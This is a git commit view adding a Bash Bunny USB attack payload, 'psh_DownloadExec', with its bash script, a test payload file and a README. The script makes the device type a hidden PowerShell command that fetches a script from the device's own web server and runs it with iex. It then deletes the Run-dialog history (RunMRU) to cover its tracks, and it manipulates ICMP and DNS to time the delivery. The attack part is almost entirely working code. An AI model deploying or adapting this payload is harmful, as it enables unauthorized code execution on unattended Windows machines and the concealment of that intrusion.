Added psh_DownloadExec payload (#110)
* [PAYLOAD] psh_DownloadExec * readme * Better status check and borrowed improvments from Hak5Darren * Updated for BashBunny v1.1_x * markdown fixpull/71/merge
parent
5dbb31506d
commit
1760b60b4f
|
@ -0,0 +1,69 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: Powershell Download and Execute
|
||||
# Author: LowValueTarget
|
||||
# Version: 1.1
|
||||
# Category: Powershell
|
||||
# Target: Windows XP SP3+ (Powershell)
|
||||
# Attackmodes: HID, RNDIS_ETHERNET
|
||||
# Firmware: >= 1.1
|
||||
#
|
||||
# OPTIMIZED FOR BASHBUNNY 1.1_x+
|
||||
#
|
||||
# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory
|
||||
#
|
||||
# | Attack Stage | Description |
|
||||
# | ------------------- | ---------------------------------------- |
|
||||
# | Stage 1 | Running Initial Powershell Commands |
|
||||
# | Stage 2 | Turning up web server and DHCP |
|
||||
# | Stage 3 | Delivering powershell payload |
|
||||
#
|
||||
|
||||
LED SETUP
|
||||
|
||||
# Set working dir
|
||||
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
|
||||
cd $PAYLOAD_DIR
|
||||
SERVER_LOG=server.log
|
||||
|
||||
# Fresh Server Log
|
||||
rm -f $SERVER_LOG
|
||||
# Disable ICMP/echo replies so our powershell stager doesn't attempt to access the SMB share before smbserver starts (workaround since Test-NetConnection 172.16.64.1 SMB only works on powershell 4.0+ for Windows 8+)
|
||||
echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all
|
||||
|
||||
# Check for psh.txt
|
||||
if [ ! -f $PAYLOAD_DIR/psh.txt ]; then
|
||||
LED FAIL
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Attack HID
|
||||
ATTACKMODE HID
|
||||
LED STAGE1
|
||||
|
||||
# Attack
|
||||
RUN WIN "powershell -WindowStyle Hidden \"while (\$TRUE) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { iex (New-Object Net.WebClient).DownloadString('http://172.16.64.1/psh.txt'); (New-Object Net.WebClient).DownloadString('http://172.16.64.1/COMPLETE'); exit } }\""
|
||||
|
||||
# Wipe prints
|
||||
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue\""
|
||||
|
||||
# Attack Ethernet
|
||||
LED STAGE2
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
|
||||
# Start web server
|
||||
iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
|
||||
python -m SimpleHTTPServer 80 > $SERVER_LOG 2>&1 &
|
||||
|
||||
# wait until python web server is listening
|
||||
while ! nc -z localhost 80; do sleep 0.2; done
|
||||
|
||||
# Re-enable ICMP/echo replies to trip the powershell stager
|
||||
echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all
|
||||
LED STAGE3
|
||||
|
||||
while ! grep -Fq "GET /COMPLETE" $SERVER_LOG; do
|
||||
sleep .5
|
||||
done
|
||||
|
||||
LED FINISH
|
|
@ -0,0 +1 @@
|
|||
powershell "New-Item $ENV:UserProfile\Desktop\psh_downloadexec_test.txt -ItemType file"
|
|
@ -0,0 +1,26 @@
|
|||
# psh_DownloadExec
|
||||
## Powershell Download and Execute
|
||||
|
||||
* Author: LowValueTarget
|
||||
* Version: Version 1.1
|
||||
* Target: Windows XP SP3+ (Powershell)
|
||||
* Category: Powershell
|
||||
* Attackmodes: HID, RNDIS_Ethernet
|
||||
* Firmware: >= 1.1
|
||||
|
||||
## Description
|
||||
|
||||
Quick HID attack to retrieve and run powershell payload from BashBunny web server.
|
||||
|
||||
## Configuration
|
||||
|
||||
Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
|
||||
|
||||
## STATUS
|
||||
```
|
||||
| Attack Stage | Description |
|
||||
| ------------------- | ---------------------------------------- |
|
||||
| Stage 1 | Running Initial Powershell Commands |
|
||||
| Stage 2 | Turning up web server and DHCP |
|
||||
| Stage 3 | Delivering powershell payload |
|
||||
```
|
Loading…
Reference in New Issue